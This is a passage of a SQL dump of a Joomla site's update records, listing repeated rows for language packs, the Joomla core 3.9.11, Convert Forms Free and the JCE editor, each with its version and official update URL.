(1103, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1104, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.2', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1105, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1106, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1107, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1108, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1109, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1110, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1111, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1112, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1113, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1114, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1115, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1116, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1117, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1118, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1119, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1120, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1121, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1122, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1123, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1124, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1125, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1126, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1127, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1128, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1129, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1130, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1131, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(1132, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1133, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1134, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1135, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1136, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1137, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1138, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1139, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1140, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1141, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1142, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1143, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1144, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1145, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1146, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1147, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1148, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1149, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1150, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1151, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1152, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1153, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1154, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1155, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1156, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1157, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1158, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1159, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1160, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1161, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1162, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1163, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1164, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1165, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1166, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1167, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1168, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1169, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1170, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1171, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1172, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1173, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1174, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1175, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1176, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1177, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1178, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1179, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1180, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1181, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1182, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1183, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1184, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1185, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1186, 18, 0, 'JCE 2.7.16', '', 'pkg_jce', 'package', '', 0, '2.7.16', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-16-released', ''),
(1187, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1188, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1189, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1190, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1191, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1192, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1193, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1194, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1195, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1196, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1197, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1198, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1199, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1200, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1201, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1202, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1203, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1204, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1205, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1206, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1207, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1208, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1209, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1210, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1211, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1212, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1213, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1214, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1215, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1216, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1217, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1218, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1219, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1220, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1221, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1222, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1223, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1224, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1225, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1226, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1227, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1228, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1229, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1230, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1231, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1232, 18, 0, 'JCE 2.7.16', '', 'pkg_jce', 'package', '', 0, '2.7.16', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-16-released', ''),
(1233, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1234, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1235, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1236, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1237, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1238, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1239, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1240, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1241, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1242, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1243, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1244, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1245, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1246, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1247, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1248, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1249, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1250, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1251, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1252, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1253, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1254, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1255, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1256, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1257, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1258, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1259, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1260, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1261, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1262, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1263, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1264, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1265, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1266, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1267, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1268, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1269, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1270, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1271, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1272, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1273, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1274, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1275, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1276, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1277, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
